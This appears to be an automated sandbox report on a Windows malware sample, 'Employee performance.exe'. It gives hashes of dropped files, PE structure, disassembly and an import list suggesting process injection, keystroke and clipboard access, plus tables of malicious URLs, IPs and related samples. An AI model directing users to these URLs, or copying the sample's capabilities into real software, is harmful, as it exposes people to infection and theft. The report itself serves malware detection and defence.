TRELLIAN-AS-APTrellianPtyLimitedAU	https://emv1.jo333.com/	Get hash	malicious	Unknown	Browse	103.224.212.210
	https://www.jo333.com/	Get hash	malicious	Unknown	Browse	103.224.212.210
	https://emv1.lqhyhy.cn/	Get hash	malicious	Unknown	Browse	103.224.212.210
	https://www.pnxubwf.cn/	Get hash	malicious	Unknown	Browse	103.224.212.210
	http://costpointfoundations.co	Get hash	malicious	Unknown	Browse	103.224.212.214
	Dekont.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.214
	MCS61094Y5OI8.exe	Get hash	malicious	FormBook	Browse	103.224.212.214
	#4857395846#.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
	RFQ31072024_August order_pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.212
	HEU_KMS_Activator.exe	Get hash	malicious	Unknown	Browse	103.224.212.216
ACPCA	5DoEwwn6p2.elf	Get hash	malicious	Mirai	Browse	162.9.87.0
	iUAAvj0XNL.elf	Get hash	malicious	Mirai	Browse	162.52.42.38
	7HddY6rYkf.elf	Get hash	malicious	Mirai	Browse	162.36.188.157
	SQBALoXp6I.elf	Get hash	malicious	Mirai	Browse	162.66.112.17
	b2bXo6vmDm.exe	Get hash	malicious	SystemBC	Browse	162.55.131.89
	SecuriteInfo.com.Win32.RATX-gen.24742.674.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.0.213.72
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	162.55.60.2
	Dovada platii bancare.exe	Get hash	malicious	Coinhive, FormBook, Xmrig	Browse	162.0.213.72
	https://www.drvhub.net	Get hash	malicious	Unknown	Browse	162.55.236.225
	Payrol list.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
CLOUDFLARENETUS	https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.31.174
	Hollandco Company Guidelines Employee Handbook___fdp (1).docx	Get hash	malicious	HTMLPhisher	Browse	104.21.46.160
	INVOICE-25738 UNIVERSAL BEARING.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Invoice_No.10.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Original copy of Bill of Lading, Invoice, PDA.bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION.exe	Get hash	malicious	FormBook	Browse	172.67.201.240
	Payment Advice-DPEB08-2SDC - SS25 Price C246SH32.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.13.205
	PO#86637 copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	PR44238-43433.exe	Get hash	malicious	FormBook	Browse	172.67.170.90
	PROFORMA.EXE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3

Process:	C:\Users\user\Desktop\Employee performance.exe
File Type:	data
Category:	dropped
Size (bytes):	181810
Entropy (8bit):	7.980871456969319
Encrypted:	false
SSDEEP:	3072:k/rkPuEXBvRusYWDuN6P0Lyw6a3OYv0t6ChorSLwjEhdPEmL5rhJiBUGsHsUu:C8XhRzYWaLywz3Lv0thh508EmxeJD
MD5:	5C3FCD6C42E5A63BAFE0D48A500B7F86
SHA1:	7E7EEA9A9952DD80FA8278571F7750EE9F57FF66
SHA-256:	2A378B59414F145348B2096A4D5FDA54B04AADDA07CC081013C868FA9AED1A5F
SHA-512:	156A49C0166A1D2DCF8D8D13902B5450E440713899D271D00AD553F40648C0ADB85E6A3C523C5E4254691815148397F264EB0FE22A097D9582390A30FD03CEC4
Malicious:	false
Reputation:	low
Preview:	EA06.......0mUJmL.Zx=...1....J.....Rg;..ngP..fT.%R..D.hS.X......'..Mne...l~......TdT...O].M....V[$..i....''....e.....e.i}Z.>.N- ...o.:..6....$^.o>...Lq....m......~i..R._..Z...2]_&I.....W:e.C.R..O...gZ...q@.V.u_.<..x...3....J...... ...2.Q..T.8.U...T.T...I..6UY.v.T...2.........#..Gd5y...D.gi......&~H.6.4..........p......\.G..............>#R.....?&.C.....oYc.T...t.....{...!..k.?.../m.H'.k.f{..Vp{9...>.Zh.-.3U2..v..o&...R.X...Z...Z-g..N...U.....;.H.g...yV.>.....q..'.;....K......v.....S..ci.L.:/.d...p......m&.lwz%U...[...{...{< .a..3&...+.H..g\l.r.Y...[.....c.lf....M.......3.U.f`...q..]M.}...cS..Zf........t....s]..P..,_B.2..0?-...T...}....C.h'}..S.E.w#UM.r...N...NN...e....K..rz..........7n.D....V..7.]....+...Fl.f.u.../...?.....n..:w.....Ga..Rh.]...a..........86M.".;..k<HF..........t(.^.....k9;8..{.b.{.t.c..{=8.'O...yq......w..-.....Z.....{6....\|..+..R.....qT...}...H..v....7.Yh<\|.K..._)V.5.q..H..-^.[...P.....T.0..v.V..v[,4.i~.n.S.$..7.oc5..~k.

C:\Users\user\AppData\Local\Temp\autA96B.tmp

Download File

Process:	C:\Users\user\Desktop\Employee performance.exe
File Type:	data
Category:	dropped
Size (bytes):	9778
Entropy (8bit):	7.652064762218806
Encrypted:	false
SSDEEP:	192:ekTYCxDR8l9LfBhZBK5iKkaV3pySGiuErhTVd1EN26ozb1HyD2so:5T19WLLZBbKkAAbErhTd626SSDM
MD5:	C218A478E5E7D7222227CFE0827A050A
SHA1:	7B8191FDD69EC0E96F15AF76FE16EEBADAF489B9
SHA-256:	6D15E63405AA49026CD629B7590A806263572C912B746D0B2378484EB58AC095
SHA-512:	2B20B0B0CB6E06E3655F6998E09DF72FFD486B36FD155433BFFD6D5969DB2D10A50BF66EC8CF7DBB32F526AEB7839A6CB39B4DF25B2D6293A687822402FA04FF
Malicious:	false
Reputation:	low
Preview:	EA06..p...gS...h..V.E.k7.......yg.......k;..g...sg.N.@.]....i...K........\|.`.o..g.N.......=.N...>.......m3..7.Z..u>..6...o.v..Z......g.>.N'....Z....N.m3.........>.Ng`...r.'.....c ....Af.H.....@.F.3<..Z..6...L.j........x..t....B\|.....Y..0.N.3[<.x...Zf.5_..r....g`5_..z.U..l.5_....U..m@5_..j.U...5\..>3`..N.^.f.Z..u;.z..y;......@........G../Z.........j\|....x.u....$.../.y=...g.G_T......-@>_.......zu:..........p...................`.M..`... ...h...@..P.'.9...{>K<..c.....Y.`._..z......>K8#G.g..3\|v...G.9..&.8_..uh..i\|v.....h.h.-.`......E..<..s.]....'v.;..=..S..L..6...f..+@.ff.y...;..m ...f..E...Y....3...............v............2p....<d....,vl...4.....!+@.'&.....,fy7.Zm6y......r.7.X...c3.L.ok.Y.!...Gf.....,f.>.Om`. .#<.....c..........z.h.s.....,vp...<..t.....40......g ....f.....4..@.6.-..p..S.U..7...S..N..;:.`..>..m....u=.....c....Z...wx.....vv.........E.....@y6....p.c3.M..9..b.!....F ....B5h..'.........vx......f..M.\|...B3....@.;=.X...f.....H........g....M.S.T..h...

C:\Users\user\AppData\Local\Temp\carryover

Download File

Process:	C:\Users\user\Desktop\Employee performance.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	modified
Size (bytes):	28674
Entropy (8bit):	3.585512485017123
Encrypted:	false
SSDEEP:	768:XBQPZgXIfqTz4G04QnW1n2mPAmg0zQshmtUt96g0k3q:wZ/fqH4G04QnWx2yAz0Asc
MD5:	72CA7EA341D43D63EF52C62AEB3219A1
SHA1:	8E9FF599990B873BD5A73FA5B1448181B6E208E4
SHA-256:	8B748400E5A9977B5E42C6F4BE07ED12FC86550161B6E31DC9FD36E14F478776
SHA-512:	98FAC97364DE1E933ED461AC8D5C5FBF363F49A0F062F603515193B3C6F840D12FAAC1548E29364CC765052EC730E1D9A61B0F7AC7A870EF4A8C98A59A1D08B7
Malicious:	false
Reputation:	low
Preview:	5}::=gjh=6jhhh575555:;:<g=;g555555;;=>9:=9g>;:555555;;=>9i=;gf<7555555;;=>::==g=;j555555;;=>9:=fg>;:555555;;=>9i=hgf;h555555;;=>::=jg=88555555;;=>9:>5g>87555555;;=>9i>7gf7j555555;;=>::>9g=;9555555;;=>9:>;g>;h555555;;=>9i>=gf;h555555;;=>::>f88h5;;=>9:>hg>;j555555;;=>=i99kkkkkkgf<9555555;;=>>:9;kkkkkkg=;9555555;;=>=:9=kkkkkkg>;h555555;;=>=i9fkkkkkkgf;h555555;;=>>:9hkkkkkkg=7j555555;;=>=:9jkkkkkkg>;9555555;;=>=i:5kkkkkkgf;h555555;;=>>::7kkkkkkg=;h555555;;=>=::9kkkkkk88h>;;=>=i:;kkkkkkgf<:555555;;=>::i5g=<8555555;;=>9:i7g>;:555555;;=>9ii9gf<7555555;;=>::i;g=88555555;;=>9:i=g>87555555;;=>9iifgf7j555555;;=>::ihg=;9555555;;=>9:ijg>;h555555;;=>9ij5gf;h555555;;=>::j788h5;;=>9:j9g>;6555555;;=>=i;=kkkkkkgf;9555555;;=>>:;fkkkkkkg=<;555555;;=>=:;hkkkkkkg>;6555555;;=>=i;jkkkkkkgf<5555555;;=>>:<5kkkkkkg=;>555555;;=>=:<7kkkkkkg>88555555;;=>=i<9kkkkkkgf87555555;;=>>:<;kkkkkkg=7j555555;;=>=:<=kkkkkkg>;9555555;;=>=i<fkkkkkkgf;h555555;;=>>:<hkkkkkkg=;h555555;;=>=:<jkkkkkk88h>;;=>9i=5gf<8555555;;=>::f5g=;=

C:\Users\user\AppData\Local\Temp\maneuverability

Download File

Process:	C:\Users\user\Desktop\Employee performance.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.858489710797478
Encrypted:	false
SSDEEP:	3072:gV2Ja4KEWQS8xgSQNMhLpl2Poqo8ge9Nm2ZY+EDVqaq95:gQJa4lS8xHQAl2rgezmNh5qh5
MD5:	71DB57A10BB482F6184EFDD192EB9CC0
SHA1:	A149EF43EA6EF2812B837BBE9206CDF5252A70D1
SHA-256:	E5B3E94E6A2644653C595FED75E2E8DA630648F90EF59660279B3C41C123F183
SHA-512:	8212EA81A653985C04D032B1A204744C23E18E2A8D576C524433B10E7E8B0945C71C1A433D95D83DDD8E3E035332EF80183BF0193A66AF2D078510A4474130D3
Malicious:	false
Reputation:	low
Preview:	.....R6LJi..B......DW...dI9...3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ.B9K=O.[2.M.c.7....Q"@pC']*65/rU-$_-MkQ5.'G#d=,rr.../V/V~>X8iDTBR6LJ..1...U..."..P..1...6..2....4..J....U.a<Q%..$.6LJ1B9K3P3U2MDTB.sLJ}C8Kp...2MDTBR6L.1@8@2Z3U.ODTBR6LJ1B..2P3E2MD.@R6L.1B)K3P1U2HDUBR6LJ4B8K3P3U2.FTBP6LJ1B9I3..U2]DTRR6LJ!B9[3P3U2MTTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P.!W50TBR".H1B)K3P.W2MTTBR6LJ1B9K3P3U.MD4BR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3P3U2MDTBR6LJ1B9K3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.981547445640695
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Employee performance.exe
File size:	1'127'424 bytes
MD5:	dca3f0ad0eaa9ed5eabfab13b8e5e72c
SHA1:	2db545db06211a8dd2317e9e08b5fdfc3431ca28
SHA256:	2f1f6bee630ceab483495b681e2468e018f6a9f2f28842d9ac7b40cf1e621f08
SHA512:	21b1e786096e88434320020c13eef11e18c73d8b2d115425e731391a28c15739f3d55532cf08cb5d53fe7c2e5dae58a016d3202aeb7362a45e8520ce1cb38e61
SSDEEP:	24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8aw9tMmI3fHsDbo:KTvC/MTQYxsWR7aw9emI/2
TLSH:	6035BF027391C062FFAB92334F5AF6515BBC69260123E61F13A81D79BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66AC1D5E [Thu Aug 1 23:42:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F5510CCD513h
jmp 00007F5510CCCE1Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F5510CCCFFDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F5510CCCFCAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F5510CCFBBDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F5510CCFC08h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F5510CCFBF1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x3c904	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x111000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x3c904	0x3ca00	b1c5c7c85e600ec483d2331efd992055	False	0.8913740335051547	data	7.805436849089702	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x111000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x33bca	data			1.0003350415734684
RT_GROUP_ICON	0x110384	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1103fc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x110410	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x110424	0x14	data	English	Great Britain	1.25
RT_VERSION	0x110438	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x110514	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
